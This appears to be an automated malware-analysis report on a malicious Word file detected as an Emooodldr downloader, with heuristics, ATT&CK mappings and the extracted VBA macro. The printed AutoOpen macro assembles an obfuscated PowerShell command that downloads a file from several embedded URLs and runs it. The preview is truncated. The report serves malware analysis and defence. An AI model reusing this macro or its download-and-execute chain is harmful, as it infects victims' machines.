MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is a malicious Microsoft Word document containing a VBA macro. The AutoOpen macro is designed to execute a command using the Shell function, indicating it's likely a downloader. The ClamAV detection name 'Doc.Downloader.Emooodldr-6691367-0' strongly suggests the Emooodldr family and its downloader capabilities.
Heuristics 5
-
ClamAV: Doc.Downloader.Emooodldr-6691367-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emooodldr-6691367-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4704 bytes |
SHA-256: 6382ead2f5df1b99cda875bc29e7241f813ff1e062ce2086d1fc9ca8f546b9de |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "bIudFiTnNZGCL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
Const PMfOj = 0
Dim WEJwN(3)
WEJwN(0) = MidB(wFPYbB, 709, 78)
WEJwN(1) = Left(ZVFIqc, 123)
WEJwN(2) = Mid(QAZRiN, 403, 76)
Dim zjMcm(4)
zjMcm(0) = MidB(wFPYbB, 709, 78)
zjMcm(1) = Right(sKJoAwi, 48)
zjMcm(2) = Mid(QAZRiN, 403, 76)
zjMcm(3) = Mid(QAZRiN, 403, 76)
Dim vkGmP(4)
vkGmP(0) = Mid(QAZRiN, 403, 76)
vkGmP(1) = Right(sKJoAwi, 48)
vkGmP(2) = Right(sKJoAwi, 48)
vkGmP(3) = Mid(QAZRiN, 403, 76)
Shell@ qWSquiG + YGCoDzCWB + zWTVbkTEV, CInt(PMfOj)
Dim kXSolp(3)
kXSolp(0) = Mid(QAZRiN, 403, 76)
kXSolp(1) = MidB(wFPYbB, 709, 78)
kXSolp(2) = Left(ZVFIqc, 123)
Dim GOzEpA(3)
GOzEpA(0) = MidB(wFPYbB, 709, 78)
GOzEpA(1) = Mid(QAZRiN, 403, 76)
GOzEpA(2) = Mid(QAZRiN, 403, 76)
End Sub
Attribute VB_Name = "KRtOEzBhBd"
Function qWSquiG()
Dim wMBOuw(4)
wMBOuw(0) = MidB(wFPYbB, 709, 78)
wMBOuw(1) = MidB(wFPYbB, 709, 78)
wMBOuw(2) = Mid(QAZRiN, 403, 76)
wMBOuw(3) = MidB(wFPYbB, 709, 78)
Dim zjkzL(5)
zjkzL(0) = Mid(QAZRiN, 403, 76)
zjkzL(1) = Left(ZVFIqc, 123)
zjkzL(2) = Right(sKJoAwi, 48)
zjkzL(3) = Right(sKJoAwi, 48)
zjkzL(4) = Left(ZVFIqc, 123)
Dim LPPoO(2)
LPPoO(0) = MidB(wFPYbB, 709, 78)
LPPoO(1) = Right(sKJoAwi, 48)
Dim vTjOHJ(3)
vTjOHJ(0) = Right(sKJoAwi, 48)
vTjOHJ(1) = Right(sKJoAwi, 48)
vTjOHJ(2) = Right(sKJoAwi, 48)
Dim vQoMtF(4)
vQoMtF(0) = Mid(QAZRiN, 403, 76)
vQoMtF(1) = Mid(QAZRiN, 403, 76)
vQoMtF(2) = Mid(QAZRiN, 403, 76)
vQoMtF(3) = Left(ZVFIqc, 123)
LHEEaXi = Format(Chr(0 + 5 + 7 + 15 + 72)) + "md /V^:^ON/" + Format(Chr(0 + 3 + 5 + 10 + 49)) + Format(Chr(0 + 1 + 2 + 4 + 27)) + "s^e^t" + " b^xV^3=^ ^ ^ ^" + " ^ ^ ^ ^ }" + "}^{h" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^t^a" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^};ka^erb;^ZG" + "^S^$^ ^me^t^I-^e^" + "kovn^I;)ZGS$^" + " ^,^l^ta" + "$(eli^F^d^a^" + "oln^w^oD^.o^sr${yrt^{)n^" + "DQ$^ ni"
Dim KhKuQF(5)
KhKuQF(0) = Left(ZVFIqc, 123)
KhKuQF(1) = Left(ZVFIqc, 123)
KhKuQF(2) = Right(sKJoAwi, 48)
KhKuQF(3) = Left(ZVFIqc, 123)
KhKuQF(4) = Left(ZVFIqc, 123)
Dim kGikS(4)
kGikS(0) = Right(sKJoAwi, 48)
kGikS(1) = Left(ZVFIqc, 123)
kGikS(2) = Left(ZVFIqc, 123)
kGikS(3) = MidB(wFPYbB, 709, 78)
auRnmzU = " ^lt^a$(h" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^a^er^o^f;^'ex^e" + "^.'^+V^f^s$^+^'^\'+" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "i" + "^l^bup^:vne^$^=^" + "Z^GS^$^;^'^63^8^' ^= " + "Vf^s^$;)'^@'(t^i^lpS.^'S" + "/^ln^.ej^tn^" + "ee//:^" + "pt^th^@^XQ^xK8A" + Format(Chr(0 + 3 + 5 + 10 + 49)) + "r/^k" + "^u^.o" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^.m^" + "a^p^s^t^ae//^:^p^t" + "th^@hZ/^m^o" + Format(Chr(0 + 5 + 7 + 15 + 72)) + ".lla^wo^d//^:p^t^"
Dim fEcdnO(5)
fEcdnO(0) = Right(sKJoAwi, 48)
fEcdnO(1) = Right(sKJoAwi, 48)
fEcdnO(2) = Mid(QAZRiN, 403, 76)
fEcdnO(3) = MidB(wFPYbB, 709, 78)
fEcdnO(4) = Right(sKJoAwi, 48)
Dim HBYYjw(3)
HBYYjw(0) = Right(sKJoAwi, 48)
HBYYjw(1) = Mid(QAZRiN, 403, 76)
HBYYjw(2) = MidB(wFPYbB, 709, 78)
Dim OtZhz(4)
OtZhz(0) = MidB(wFPYbB, 709, 78)
OtZhz(1) = Left(ZVFIqc, 123)
OtZhz(2) = Mid(QAZRiN, 403, 76)
OtZhz(3) = Left(ZVFIqc, 123)
Dim jmjhB(2)
jmjhB(0) = Mid(QAZRiN, 403, 76)
jmjhB(1) = Mid(QAZRiN, 403, 76)
XYMwqhmOvq = "t^h@^5g/mo" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "^.rak^a^h^t^d//^:^p^tt^h^@eO/" + "m^o" + Format(Chr(0 + 5 + 7 + 15 + 72)) + ".ralud^o^m^le//^" + ":p^tt^h'^=n^D^Q" + "$;tneil" + Format(Chr(0 + 3 + 5 + 10 + 49)) + "^beW.^t^eN^ t" + Format(Chr(0 + 5 + 7 + 15 + 72)) + "e" + "^j^b^o-^wen=o^sr$^ " + "^l^l^e^h" + "sre^wo^p&&^f^or /^L %^5 ^in" + " (^3^25,^-1^,^0)^d^o s^e^t ^W^" + "X^l=!^W^X^l!!b^xV^3" + ":~%^5,1!"
Dim XvUajt(3)
XvUajt(0) = Right(sKJoAwi, 48)
XvUajt(1) = Left(ZVFIqc, 123)
XvUajt(2) = Right(sKJoAwi, 48)
Dim DMGHb(2)
DMGHb(0) = Mid(QAZRiN, 403, 76)
DMGHb(1) = MidB(wFPYbB, 709, 78)
DYVBo = "&&i^f %^
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.